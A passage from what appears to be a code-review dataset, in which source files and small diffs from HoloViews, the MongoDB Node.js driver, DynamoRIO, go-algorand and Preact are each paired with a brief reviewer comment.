from ..renderer import Renderer, MIME_TYPES
from .comms import (JupyterComm, NbAggJupyterComm,
mpl_msg_handler, mpld3_msg_handler)
from .widgets import MPLSelectionWidget, MPLScrubberWidget
from .util import get_tight_bbox
class OutputWarning(param.Parameterized):pass
outputwarning = OutputWarning(name='Warning')
class MPLRenderer(Renderer):
"""
Exporter used to render data from matplotlib, either to a stream
or directly to file.
The __call__ method renders an HoloViews component to raw data of
a specified matplotlib format. The save method is the
corresponding method for saving a HoloViews objects to disk.
The save_fig and save_anim methods are used to save matplotlib
figure and animation objects. These match the two primary return
types of plotting class implemented with matplotlib.
"""
drawn = {}
backend = param.String('matplotlib', doc="The backend name.")
dpi=param.Integer(72, doc="""
The render resolution in dpi (dots per inch)""")
fig = param.ObjectSelector(default='auto',
objects=['png', 'svg', 'pdf', 'html', None, 'auto'], doc="""
Output render format for static figures. If None, no figure
rendering will occur. """)
holomap = param.ObjectSelector(default='auto',
objects=['widgets', 'scrubber', 'webm','mp4', 'gif', None, 'auto'], doc="""
Output render multi-frame (typically animated) format. If
None, no multi-frame rendering will occur.""")
interactive = param.Boolean(default=False, doc="""
Whether to enable interactive plotting allowing interactive
plotting with explicitly calling show.""")
mode = param.ObjectSelector(default='default',
objects=['default', 'mpld3', 'nbagg'], doc="""
The 'mpld3' mode uses the mpld3 library whereas the 'nbagg' uses
matplotlib's the experimental nbagg backend. """)
# <format name> : (animation writer, format, anim_kwargs, extra_args)
ANIMATION_OPTS = {
'webm': ('ffmpeg', 'webm', {},
['-vcodec', 'libvpx', '-b', '1000k']),
'mp4': ('ffmpeg', 'mp4', {'codec': 'libx264'},
['-pix_fmt', 'yuv420p']),
'gif': ('imagemagick', 'gif', {'fps': 10}, []),
'scrubber': ('html', None, {'fps': 5}, None)
}
mode_formats = {'fig':{'default': ['png', 'svg', 'pdf', 'html', None, 'auto'],
'mpld3': ['html', 'json', None, 'auto'],
'nbagg': ['html', None, 'auto']},
'holomap': {m:['widgets', 'scrubber', 'webm','mp4', 'gif',
'html', None, 'auto']
for m in ['default', 'mpld3', 'nbagg']}}
counter = 0
# Define appropriate widget classes
widgets = {'scrubber': MPLScrubberWidget,
'widgets': MPLSelectionWidget}
# Define comm targets by mode
comms = {'default': (JupyterComm, mpl_msg_handler),
'nbagg': (NbAggJupyterComm, None),
'mpld3': (JupyterComm, mpld3_msg_handler)}
def __call__(self, obj, fmt='auto'):
"""
Render the supplied HoloViews component or MPLPlot instance
using matplotlib.
"""
plot, fmt = self._validate(obj, fmt)
if plot is None: return
if isinstance(plot, tuple(self.widgets.values())):
data = plot()
elif fmt in ['png', 'svg', 'pdf', 'html', 'json']:
with mpl.rc_context(rc=plot.fig_rcparams):
data = self._figure_data(plot, fmt, **({'dpi':self.dpi} if self.dpi else {}))
else:
if sys.version_info[0] == 3 and mpl.__version__[:-2] in ['1.2', '1.3']:
raise Exception("<b>Python 3 matplotlib animation support broken <= 1.3</b>")
with mpl.rc_context(rc=plot.fig_rcparams):
anim = plot.anim(fps=self.fps)
data = self._anim_data(anim, fmt)
data = self._apply_post_render_hooks(data, obj, fmt)
return data, {'file-ext':fmt,
'mime_type':MIME_TYPES[fmt]}
def show(self, obj):
"""
Renders the supplied object and displays it using the active
GUI backend.
"""
if self.interactive:
if isinstance(obj, list):
return [self.get_plot(o) for o in obj]
return self.get_plot(obj)
from .plot import MPLPlot
MPLPlot._close_figures = False
try:
plots = []
objects = obj if isinstance(obj, list) else [obj]
for o in obj:
plots.append(self.get_plot(o))
plt.show()
except:
MPLPlot._close_figures = True
raise
MPLPlot._close_figures = True
return plots[0] if len(plots) == 1 else plots
@classmethod
def plot_options(cls, obj, percent_size):
"""
Given a holoviews object and a percentage size, apply heuristics
to compute a suitable figure size. For instance, scaling layouts
and grids linearly can result in unwieldy figure sizes when there
are a large number of elements. As ad hoc heuristics are used,
this functionality is kept separate from the plotting classes
themselves.
Used by the IPython Notebook display hooks and the save
utility. Note that this can be overridden explicitly per object
using the fig_size and size plot options.
"""
from .plot import MPLPlot
factor = percent_size / 100.0
obj = obj.last if isinstance(obj, HoloMap) else obj
options = Store.lookup_options(cls.backend, obj, 'plot').options
fig_size = options.get('fig_size', MPLPlot.fig_size)*factor
return dict({'fig_size':fig_size},
**Store.lookup_options(cls.backend, obj, 'plot').options)
@bothmethod
def get_size(self_or_cls, plot):
w, h = plot.state.get_size_inches()
dpi = self_or_cls.dpi if self_or_cls.dpi else plot.state.dpi
return (int(w*dpi), int(h*dpi))
def diff(self, plot):
"""
Returns the latest plot data to update an existing plot.
"""
data = None
if self.mode != 'nbagg':
if self.mode == 'mpld3':
figure_format = 'json'
elif self.fig == 'auto':
figure_format = self.params('fig').objects[0]
else:
figure_format = self.fig
data = self.html(plot, figure_format, comm=False)
return data
def _figure_data(self, plot, fmt='png', bbox_inches='tight', **kwargs):
"""
Render matplotlib figure object and return the corresponding data.
Similar to IPython.core.pylabtools.print_figure but without
any IPython dependency.
"""
fig = plot.state
if self.mode == 'nbagg':
manager = plot.comm.get_figure_manager()
if manager is None: return ''
self.counter += 1
manager.show()
return ''
elif self.mode == 'mpld3':
import mpld3
fig.dpi = self.dpi
mpld3.plugins.connect(fig, mpld3.plugins.MousePosition(fontsize=14))
if fmt == 'json':
return mpld3.fig_to_dict(fig)
else:
figid = "fig_el"+plot.comm.id if plot.comm else None
html = mpld3.fig_to_html(fig, figid=figid)
html = "<center>" + html + "<center/>"
if plot.comm:
comm, msg_handler = self.comms[self.mode]
msg_handler = msg_handler.format(comm_id=plot.comm.id)
return comm.template.format(init_frame=html,
msg_handler=msg_handler,
comm_id=plot.comm.id)
return html
traverse_fn = lambda x: x.handles.get('bbox_extra_artists', None)
extra_artists = list(chain(*[artists for artists in plot.traverse(traverse_fn)
if artists is not None]))
kw = dict(
format=fmt,
facecolor=fig.get_facecolor(),
edgecolor=fig.get_edgecolor(),
dpi=self.dpi,
bbox_inches=bbox_inches,
bbox_extra_artists=extra_artists
)
kw.update(kwargs)
# Attempts to precompute the tight bounding box
try:
kw = self._compute_bbox(fig, kw)
except:
pass
bytes_io = BytesIO()
fig.canvas.print_figure(bytes_io, **kw)
data = bytes_io.getvalue()
if fmt == 'svg':
data = data.decode('utf-8')
return data
def _anim_data(self, anim, fmt):
"""
Render a matplotlib animation object and return the corresponding data.
"""
(writer, _, anim_kwargs, extra_args) = self.ANIMATION_OPTS[fmt]
if extra_args != []:
anim_kwargs = dict(anim_kwargs, extra_args=extra_args)
if self.fps is not None: anim_kwargs['fps'] = max([int(self.fps), 1])
if self.dpi is not None: anim_kwargs['dpi'] = self.dpi
if not hasattr(anim, '_encoded_video'):
with NamedTemporaryFile(suffix='.%s' % fmt) as f:
anim.save(f.name, writer=writer, **anim_kwargs)
video = open(f.name, "rb").read()
return video
def _compute_bbox(self, fig, kw):
"""
Compute the tight bounding box for each figure once, reducing
number of required canvas draw calls from N*2 to N+1 as a
function of the number of frames.
Tight bounding box computing code here mirrors:
matplotlib.backend_bases.FigureCanvasBase.print_figure
as it hasn't been factored out as a function.
"""
fig_id = id(fig)
if kw['bbox_inches'] == 'tight':
if not fig_id in MPLRenderer.drawn:
fig.set_dpi(self.dpi)
fig.canvas.draw()
extra_artists = kw.pop("bbox_extra_artists", [])
pad = plt.rcParams['savefig.pad_inches']
bbox_inches = get_tight_bbox(fig, extra_artists, pad=pad)
MPLRenderer.drawn[fig_id] = bbox_inches
kw['bbox_inches'] = bbox_inches
else:
kw['bbox_inches'] = MPLRenderer.drawn[fig_id]
return kw
@classmethod
@contextmanager
def state(cls):
try:
cls._rcParams = dict(mpl.rcParams)
yield
finally:
mpl.rcParams = cls._rcParams
@classmethod
def validate(cls, options):
"""
Validates a dictionary of options set on the backend.
"""
if options['backend']=='matplotlib:nbagg' and options['widgets'] != 'live':
outputwarning.warning("The widget mode must be set to 'live' for "
"matplotlib:nbagg.\nSwitching widget mode to 'live'.")
options['widgets'] = 'live'
return options
@classmethod
def load_nb(cls, inline=True):
"""
Initialize matplotlib backend
"""
import matplotlib.pyplot as plt
plt.switch_backend('agg')
| 1 | 17,409 | As the bokeh renderer also has a ``load_nb`` classmethod (and notebooks are explicitly mentioned in that method name), I would consider making ``_notebook`` into a constant ``notebook_context`` class parameter. The docstring can say it is set to True if the ``load_nb`` classmethod has been called. | holoviz-holoviews | py |
@@ -2,7 +2,6 @@
const CommandOperation = require('./command');
const handleCallback = require('../utils').handleCallback;
-const MongoError = require('../core').MongoError;
class DropCollectionOperation extends CommandOperation {
constructor(db, command, options) { | 1 | 'use strict';
const CommandOperation = require('./command');
const handleCallback = require('../utils').handleCallback;
const MongoError = require('../core').MongoError;
class DropCollectionOperation extends CommandOperation {
constructor(db, command, options) {
super(db, command, options);
}
execute(callback) {
const db = this.db;
super.execute((err, result) => {
// Did the user destroy the topology
if (db.serverConfig && db.serverConfig.isDestroyed()) {
return callback(new MongoError('topology was destroyed'));
}
if (err) return handleCallback(callback, err);
if (result.ok) return handleCallback(callback, null, true);
handleCallback(callback, null, false);
});
}
}
module.exports = DropCollectionOperation;
| 1 | 15,518 | Where is the actual command generated here? Shouldn't this be taking in `constructor(db, collectionName, options)` and then constructing the command off of that? | mongodb-node-mongodb-native | js |
@@ -55,7 +55,8 @@
int
memquery_library_bounds_by_iterator(const char *name, app_pc *start /*IN/OUT*/,
app_pc *end /*OUT*/, char *fullpath /*OPTIONAL OUT*/,
- size_t path_size)
+ size_t path_size, char *filename,
+ size_t filename_size)
{
int count = 0;
bool found_library = false; | 1 | /* *******************************************************************************
* Copyright (c) 2010-2017 Google, Inc. All rights reserved.
* Copyright (c) 2011 Massachusetts Institute of Technology All rights reserved.
* Copyright (c) 2000-2010 VMware, Inc. All rights reserved.
* *******************************************************************************/
/*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* * Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* * Neither the name of VMware, Inc. nor the names of its contributors may be
* used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL VMWARE, INC. OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
* DAMAGE.
*/
/*
* memquery.c - memory querying code shared across unix platforms
*/
#include "../globals.h"
#include "memquery.h"
#include "module.h"
#include <string.h>
/***************************************************************************
* LIBRARY BOUNDS
*/
/* See memquery.h for full interface specs, which are identical to
* memquery_library_bounds().
*
* XXX: I'd like to make unit tests for these maps file readers, but we
* can't just supply mock maps file enries: this code also walks ELF headers
* which complicates things. For now we just go with live tests.
*/
int
memquery_library_bounds_by_iterator(const char *name, app_pc *start /*IN/OUT*/,
app_pc *end /*OUT*/, char *fullpath /*OPTIONAL OUT*/,
size_t path_size)
{
int count = 0;
bool found_library = false;
char libname[MAXIMUM_PATH];
const char *name_cmp = name;
memquery_iter_t iter;
app_pc target = *start;
app_pc last_lib_base = NULL;
app_pc last_lib_end = NULL;
app_pc prev_base = NULL;
app_pc prev_end = NULL;
uint prev_prot = 0;
size_t image_size = 0;
app_pc cur_end = NULL;
app_pc mod_start = NULL;
ASSERT(name != NULL || start != NULL);
/* If name is non-NULL, start can be NULL, so we have to walk the whole
* address space even when we have syscalls for memquery (e.g., on Mac).
* Even if start is non-NULL, it could be in the middle of the library.
*/
memquery_iterator_start(&iter, NULL,
/* We're never called from a fragile place like a
* signal handler, so as long as it's not real early
* it's ok to alloc.
*/
dynamo_heap_initialized);
libname[0] = '\0';
while (memquery_iterator_next(&iter)) {
LOG(GLOBAL, LOG_VMAREAS, 5, "start=" PFX " end=" PFX " prot=%x comment=%s\n",
iter.vm_start, iter.vm_end, iter.prot, iter.comment);
/* Record the base of each differently-named set of entries up until
* we find our target, when we'll clobber libpath
*/
if (!found_library &&
((iter.comment[0] != '\0' &&
strncmp(libname, iter.comment, BUFFER_SIZE_ELEMENTS(libname)) != 0) ||
(iter.comment[0] == '\0' && prev_end != NULL &&
prev_end != iter.vm_start))) {
last_lib_base = iter.vm_start;
/* Include a prior anon mapping if interrupted and a header and this
* mapping is not a header. This happens for some page mapping
* schemes (i#2566).
*/
if (prev_end == iter.vm_start && prev_prot == (MEMPROT_READ | MEMPROT_EXEC) &&
module_is_header(prev_base, prev_end - prev_base) &&
!module_is_header(iter.vm_start, iter.vm_end - iter.vm_start))
last_lib_base = prev_base;
/* last_lib_end is used to know what's readable beyond last_lib_base */
if (TEST(MEMPROT_READ, iter.prot))
last_lib_end = iter.vm_end;
else
last_lib_end = last_lib_base;
/* remember name so we can find the base of a multiply-mapped so */
strncpy(libname, iter.comment, BUFFER_SIZE_ELEMENTS(libname));
NULL_TERMINATE_BUFFER(libname);
}
if ((name_cmp != NULL &&
(strstr(iter.comment, name_cmp) != NULL ||
/* For Linux, include mid-library (non-.bss) anonymous mappings.
* Our private loader
* fills mapping holes with anonymous memory instead of a
* MEMPROT_NONE mapping from the original file.
* For Mac, this includes mid-library .bss.
*/
(found_library && iter.comment[0] == '\0' && image_size != 0 &&
iter.vm_end - mod_start < image_size))) ||
(name == NULL && target >= iter.vm_start && target < iter.vm_end)) {
if (!found_library && iter.comment[0] == '\0' && last_lib_base == NULL) {
/* Wait for the next entry which should have a file backing. */
target = iter.vm_end;
} else if (!found_library) {
char *dst = (fullpath != NULL) ? fullpath : libname;
const char *src = (iter.comment[0] == '\0') ? libname : iter.comment;
size_t dstsz =
(fullpath != NULL) ? path_size : BUFFER_SIZE_ELEMENTS(libname);
size_t mod_readable_sz;
if (src != dst) {
if (dst == fullpath) {
/* Just the path. We use strstr for name_cmp. */
char *slash = strrchr(src, '/');
ASSERT_CURIOSITY(slash != NULL);
ASSERT_CURIOSITY((slash - src) < dstsz);
/* we keep the last '/' at end */
++slash;
strncpy(dst, src, MIN(dstsz, (slash - src)));
} else
strncpy(dst, src, dstsz);
/* if max no null */
dst[dstsz - 1] = '\0';
}
if (name == NULL)
name_cmp = dst;
found_library = true;
/* Most libraries have multiple segments, and some have the
* ELF header repeated in a later mapping, so we can't rely
* on is_elf_so_header() and header walking.
* We use the name tracking to remember the first entry
* that had this name.
*/
if (last_lib_base == NULL) {
mod_start = iter.vm_start;
mod_readable_sz = iter.vm_end - iter.vm_start;
} else {
mod_start = last_lib_base;
mod_readable_sz = last_lib_end - last_lib_base;
}
if (module_is_header(mod_start, mod_readable_sz)) {
app_pc mod_base, mod_end;
if (module_walk_program_headers(mod_start, mod_readable_sz, false,
/*i#1589: ld.so relocated .dynamic*/
true, &mod_base, NULL, &mod_end, NULL,
NULL)) {
image_size = mod_end - mod_base;
LOG(GLOBAL, LOG_VMAREAS, 4, "%s: image size is " PIFX "\n",
__FUNCTION__, image_size);
ASSERT_CURIOSITY(image_size != 0);
} else {
ASSERT_NOT_REACHED();
}
} else {
ASSERT(false && "expected elf header");
}
}
count++;
cur_end = iter.vm_end;
} else if (found_library) {
/* hit non-matching, we expect module segments to be adjacent */
break;
}
prev_base = iter.vm_start;
prev_end = iter.vm_end;
prev_prot = iter.prot;
}
/* Xref PR 208443: .bss sections are anonymous (no file name listed in
* maps file), but not every library has one. We have to parse the ELF
* header to know since we can't assume that a subsequent anonymous
* region is .bss. */
if (image_size != 0 && cur_end - mod_start < image_size) {
if (iter.comment[0] != '\0') {
/* There's something else in the text-data gap: xref i#2641. */
} else {
/* Found a .bss section. Check current mapping (note might only be
* part of the mapping (due to os region merging? FIXME investigate).
*/
ASSERT_CURIOSITY(iter.vm_start == cur_end /* no gaps, FIXME might there be
* a gap if the file has large
* alignment and no data section?
* curiosity for now*/);
ASSERT_CURIOSITY(iter.inode == 0); /* .bss is anonymous */
/* should be big enough */
ASSERT_CURIOSITY(iter.vm_end - mod_start >= image_size);
}
count++;
cur_end = mod_start + image_size;
} else {
/* Shouldn't have more mapped then the size of the module, unless it's a
* second adjacent separate map of the same file. Curiosity for now. */
ASSERT_CURIOSITY(image_size == 0 || cur_end - mod_start == image_size);
}
memquery_iterator_stop(&iter);
if (name == NULL && *start < mod_start)
count = 0; /* Our target adjustment missed: we never found a file-backed entry */
if (start != NULL)
*start = mod_start;
if (end != NULL)
*end = cur_end;
return count;
}
| 1 | 14,385 | Mirror the `OPTIONAL OUT` of fullpath | DynamoRIO-dynamorio | c |
@@ -94,13 +94,16 @@ const ConsensusV17 = ConsensusVersion(
"https://github.com/algorandfoundation/specs/tree/5615adc36bad610c7f165fa2967f4ecfa75125f0",
)
+// ConsensusVNext stand-in for protocol with LogicSig and TEAL v1
+const ConsensusVNext = ConsensusVersion("NEXT!")
+
// !!! ********************* !!!
// !!! *** Please update ConsensusCurrentVersion when adding new protocol versions *** !!!
// !!! ********************* !!!
// ConsensusCurrentVersion is the latest version and should be used
// when a specific version is not provided.
-const ConsensusCurrentVersion = ConsensusV17
+const ConsensusCurrentVersion = ConsensusVNext
// ConsensusTest0 is a version of ConsensusV0 used for testing
// (it has different approved upgrade paths). | 1 | // Copyright (C) 2019 Algorand, Inc.
// This file is part of go-algorand
//
// go-algorand is free software: you can redistribute it and/or modify
// it under the terms of the GNU Affero General Public License as
// published by the Free Software Foundation, either version 3 of the
// License, or (at your option) any later version.
//
// go-algorand is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU Affero General Public License for more details.
//
// You should have received a copy of the GNU Affero General Public License
// along with go-algorand. If not, see <https://www.gnu.org/licenses/>.
package protocol
// ConsensusVersion is a string that identifies a version of the
// consensus protocol.
type ConsensusVersion string
// DEPRECATEDConsensusV0 is a baseline version of the Algorand consensus protocol.
// at the time versioning was introduced.
// It is now deprecated.
const DEPRECATEDConsensusV0 = ConsensusVersion("v0")
// DEPRECATEDConsensusV1 adds support for Genesis ID in transactions, but does not
// require it (transactions missing a GenesisID value are still allowed).
// It is now deprecated.
const DEPRECATEDConsensusV1 = ConsensusVersion("v1")
// DEPRECATEDConsensusV2 fixes a bug in the agreement protocol where proposalValues
// fail to commit to the original period and sender of a block.
const DEPRECATEDConsensusV2 = ConsensusVersion("v2")
// DEPRECATEDConsensusV3 adds support for fine-grained ephemeral keys.
const DEPRECATEDConsensusV3 = ConsensusVersion("v3")
// DEPRECATEDConsensusV4 adds support for a min balance and a transaction that
// closes out an account.
const DEPRECATEDConsensusV4 = ConsensusVersion("v4")
// DEPRECATEDConsensusV5 sets MinTxnFee to 1000 and fixes a blance lookback bug
const DEPRECATEDConsensusV5 = ConsensusVersion("v5")
// DEPRECATEDConsensusV6 adds support for explicit ephemeral-key parameters
const DEPRECATEDConsensusV6 = ConsensusVersion("v6")
// ConsensusV7 increases MaxBalLookback to 320 in preparation for
// the twin seeds change.
const ConsensusV7 = ConsensusVersion("v7")
// ConsensusV8 uses the new parameters and seed derivation policy
// from the agreement protocol's security analysis.
const ConsensusV8 = ConsensusVersion("v8")
// ConsensusV9 increases min balance to 100,000 microAlgos.
const ConsensusV9 = ConsensusVersion("v9")
// ConsensusV10 introduces fast partition recovery.
const ConsensusV10 = ConsensusVersion("v10")
// ConsensusV11 introduces efficient encoding of SignedTxn using SignedTxnInBlock.
const ConsensusV11 = ConsensusVersion("v11")
// ConsensusV12 increases the maximum length of a version string.
const ConsensusV12 = ConsensusVersion("v12")
// ConsensusV13 makes the consensus version a meaningful string.
const ConsensusV13 = ConsensusVersion(
// Points to version of the Algorand spec as of May 21, 2019.
"https://github.com/algorand/spec/tree/0c8a9dc44d7368cc266d5407b79fb3311f4fc795",
)
// ConsensusV14 adds tracking of closing amounts in ApplyData,
// and enables genesis hash in transactions.
const ConsensusV14 = ConsensusVersion(
"https://github.com/algorand/spec/tree/2526b6ae062b4fe5e163e06e41e1d9b9219135a9",
)
// ConsensusV15 adds tracking of reward distributions in ApplyData.
const ConsensusV15 = ConsensusVersion(
"https://github.com/algorand/spec/tree/a26ed78ed8f834e2b9ccb6eb7d3ee9f629a6e622",
)
// ConsensusV16 fixes domain separation in Credentials and requires GenesisHash.
const ConsensusV16 = ConsensusVersion(
"https://github.com/algorand/spec/tree/22726c9dcd12d9cddce4a8bd7e8ccaa707f74101",
)
// ConsensusV17 points to 'final' spec commit
const ConsensusV17 = ConsensusVersion(
"https://github.com/algorandfoundation/specs/tree/5615adc36bad610c7f165fa2967f4ecfa75125f0",
)
// !!! ********************* !!!
// !!! *** Please update ConsensusCurrentVersion when adding new protocol versions *** !!!
// !!! ********************* !!!
// ConsensusCurrentVersion is the latest version and should be used
// when a specific version is not provided.
const ConsensusCurrentVersion = ConsensusV17
// ConsensusTest0 is a version of ConsensusV0 used for testing
// (it has different approved upgrade paths).
const ConsensusTest0 = ConsensusVersion("test0")
// ConsensusTest1 is an extension of ConsensusTest0 that
// supports a sorted-list balance commitment.
const ConsensusTest1 = ConsensusVersion("test1")
// ConsensusTestBigBlocks is a version of ConsensusV0 used for testing
// with big block size (large MaxTxnBytesPerBlock).
// at the time versioning was introduced.
const ConsensusTestBigBlocks = ConsensusVersion("test-big-blocks")
// ConsensusTestRapidRewardRecalculation is a version of ConsensusCurrentVersion
// that decreases the RewardRecalculationInterval greatly.
const ConsensusTestRapidRewardRecalculation = ConsensusVersion("test-fast-reward-recalculation")
// ConsensusTestFastUpgrade is meant for testing of protocol upgrades:
// during testing, it is equivalent to another protocol with the exception
// of the upgrade parameters, which allow for upgrades to take place after
// only a few rounds.
func ConsensusTestFastUpgrade(proto ConsensusVersion) ConsensusVersion {
return "test-fast-upgrade-" + proto
}
| 1 | 36,100 | Please merge with master and replace with with "future" version. | algorand-go-algorand | go |
@@ -55,7 +55,6 @@ export function diff(dom, parentDom, newVNode, oldVNode, context, isSvg, excessD
let cxType = newType.contextType;
let provider = cxType && context[cxType._id];
let cctx = cxType != null ? (provider ? provider.props.value : cxType._defaultValue) : context;
-
// Get component and set it to `c`
if (oldVNode._component) {
c = newVNode._component = oldVNode._component; | 1 | import { EMPTY_OBJ, EMPTY_ARR } from '../constants';
import { Component, enqueueRender } from '../component';
import { coerceToVNode, Fragment } from '../create-element';
import { diffChildren } from './children';
import { diffProps } from './props';
import { assign, removeNode } from '../util';
import options from '../options';
/**
* Diff two virtual nodes and apply proper changes to the DOM
* @param {import('../internal').PreactElement | Text} dom The DOM element representing
* the virtual nodes under diff
* @param {import('../internal').PreactElement} parentDom The parent of the DOM element
* @param {import('../internal').VNode | null} newVNode The new virtual node
* @param {import('../internal').VNode | null} oldVNode The old virtual node
* @param {object} context The current context object
* @param {boolean} isSvg Whether or not this element is an SVG node
* @param {Array<import('../internal').PreactElement>} excessDomChildren
* @param {Array<import('../internal').Component>} mounts A list of newly
* mounted components
* @param {import('../internal').Component | null} ancestorComponent The direct
* parent component
*/
export function diff(dom, parentDom, newVNode, oldVNode, context, isSvg, excessDomChildren, mounts, ancestorComponent, force) {
// If the previous type doesn't match the new type we drop the whole subtree
if (oldVNode==null || newVNode==null || oldVNode.type!==newVNode.type) {
if (oldVNode!=null) unmount(oldVNode, ancestorComponent);
if (newVNode==null) return null;
dom = null;
oldVNode = EMPTY_OBJ;
}
if (options.diff) options.diff(newVNode);
let c, p, isNew = false, oldProps, oldState, snapshot,
newType = newVNode.type;
/** @type {import('../internal').Component | null} */
let clearProcessingException;
try {
outer: if (oldVNode.type===Fragment || newType===Fragment) {
diffChildren(parentDom, newVNode, oldVNode, context, isSvg, excessDomChildren, mounts, c);
if (newVNode._children.length) {
dom = newVNode._children[0]._dom;
newVNode._lastDomChild = newVNode._children[newVNode._children.length - 1]._dom;
}
}
else if (typeof newType==='function') {
// Necessary for createContext api. Setting this property will pass
// the context value as `this.context` just for this component.
let cxType = newType.contextType;
let provider = cxType && context[cxType._id];
let cctx = cxType != null ? (provider ? provider.props.value : cxType._defaultValue) : context;
// Get component and set it to `c`
if (oldVNode._component) {
c = newVNode._component = oldVNode._component;
clearProcessingException = c._processingException;
}
else {
// Instantiate the new component
if (newType.prototype && newType.prototype.render) {
newVNode._component = c = new newType(newVNode.props, cctx); // eslint-disable-line new-cap
}
else {
newVNode._component = c = new Component(newVNode.props, cctx);
c.constructor = newType;
c.render = doRender;
}
c._ancestorComponent = ancestorComponent;
if (provider) provider.sub(c);
c.props = newVNode.props;
if (!c.state) c.state = {};
c.context = cctx;
c._context = context;
isNew = c._dirty = true;
c._renderCallbacks = [];
}
c._vnode = newVNode;
// Invoke getDerivedStateFromProps
let s = c._nextState || c.state;
if (newType.getDerivedStateFromProps!=null) {
oldState = assign({}, c.state);
if (s===c.state) s = c._nextState = assign({}, s);
assign(s, newType.getDerivedStateFromProps(newVNode.props, s));
}
// Invoke pre-render lifecycle methods
if (isNew) {
if (newType.getDerivedStateFromProps==null && c.componentWillMount!=null) c.componentWillMount();
if (c.componentDidMount!=null) mounts.push(c);
}
else {
if (newType.getDerivedStateFromProps==null && force==null && c.componentWillReceiveProps!=null) {
c.componentWillReceiveProps(newVNode.props, cctx);
s = c._nextState || c.state;
}
if (!force && c.shouldComponentUpdate!=null && c.shouldComponentUpdate(newVNode.props, s, cctx)===false) {
c.props = newVNode.props;
c.state = s;
c._dirty = false;
break outer;
}
if (c.componentWillUpdate!=null) {
c.componentWillUpdate(newVNode.props, s, cctx);
}
}
oldProps = c.props;
if (!oldState) oldState = c.state;
c.context = cctx;
c.props = newVNode.props;
c.state = s;
if (options.render) options.render(newVNode);
let prev = c._prevVNode;
let vnode = c._prevVNode = coerceToVNode(c.render(c.props, c.state, c.context));
c._dirty = false;
if (c.getChildContext!=null) {
context = assign(assign({}, context), c.getChildContext());
}
if (!isNew && c.getSnapshotBeforeUpdate!=null) {
snapshot = c.getSnapshotBeforeUpdate(oldProps, oldState);
}
c.base = dom = diff(dom, parentDom, vnode, prev, context, isSvg, excessDomChildren, mounts, c, null);
if (vnode!=null) {
// If this component returns a Fragment (or another component that
// returns a Fragment), then _lastDomChild will be non-null,
// informing `diffChildren` to diff this component's VNode like a Fragemnt
newVNode._lastDomChild = vnode._lastDomChild;
}
c._parentDom = parentDom;
if (newVNode.ref) applyRef(newVNode.ref, c, ancestorComponent);
}
else {
dom = diffElementNodes(dom, newVNode, oldVNode, context, isSvg, excessDomChildren, mounts, ancestorComponent);
if (newVNode.ref && (oldVNode.ref !== newVNode.ref)) {
applyRef(newVNode.ref, dom, ancestorComponent);
}
}
newVNode._dom = dom;
if (c!=null) {
while (p=c._renderCallbacks.pop()) p.call(c);
// Don't call componentDidUpdate on mount or when we bailed out via
// `shouldComponentUpdate`
if (!isNew && oldProps!=null && c.componentDidUpdate!=null) {
c.componentDidUpdate(oldProps, oldState, snapshot);
}
}
if (clearProcessingException) {
c._processingException = null;
}
if (options.diffed) options.diffed(newVNode);
}
catch (e) {
catchErrorInComponent(e, ancestorComponent);
}
return dom;
}
export function commitRoot(mounts, root) {
let c;
while ((c = mounts.pop())) {
try {
c.componentDidMount();
}
catch (e) {
catchErrorInComponent(e, c._ancestorComponent);
}
}
if (options.commit) options.commit(root);
}
/**
* Diff two virtual nodes representing DOM element
* @param {import('../internal').PreactElement} dom The DOM element representing
* the virtual nodes being diffed
* @param {import('../internal').VNode} newVNode The new virtual node
* @param {import('../internal').VNode} oldVNode The old virtual node
* @param {object} context The current context object
* @param {boolean} isSvg Whether or not this DOM node is an SVG node
* @param {*} excessDomChildren
* @param {Array<import('../internal').Component>} mounts An array of newly
* mounted components
* @param {import('../internal').Component} ancestorComponent The parent
* component to the ones being diffed
* @returns {import('../internal').PreactElement}
*/
function diffElementNodes(dom, newVNode, oldVNode, context, isSvg, excessDomChildren, mounts, ancestorComponent) {
let d = dom;
// Tracks entering and exiting SVG namespace when descending through the tree.
isSvg = newVNode.type==='svg' || isSvg;
if (dom==null && excessDomChildren!=null) {
for (let i=0; i<excessDomChildren.length; i++) {
const child = excessDomChildren[i];
if (child!=null && (newVNode.type===null ? child.nodeType===3 : child.localName===newVNode.type)) {
dom = child;
excessDomChildren[i] = null;
break;
}
}
}
if (dom==null) {
dom = newVNode.type===null ? document.createTextNode(newVNode.text) : isSvg ? document.createElementNS('http://www.w3.org/2000/svg', newVNode.type) : document.createElement(newVNode.type);
// we created a new parent, so none of the previously attached children can be reused:
excessDomChildren = null;
}
newVNode._dom = dom;
if (newVNode.type===null) {
if ((d===null || dom===d) && newVNode.text!==oldVNode.text) {
dom.data = newVNode.text;
}
}
else {
if (excessDomChildren!=null && dom.childNodes!=null) {
excessDomChildren = EMPTY_ARR.slice.call(dom.childNodes);
}
if (newVNode!==oldVNode) {
let oldProps = oldVNode.props;
let newProps = newVNode.props;
// if we're hydrating, use the element's attributes as its current props:
if (oldProps==null) {
oldProps = {};
if (excessDomChildren!=null) {
let name;
for (let i=0; i<dom.attributes.length; i++) {
name = dom.attributes[i].name;
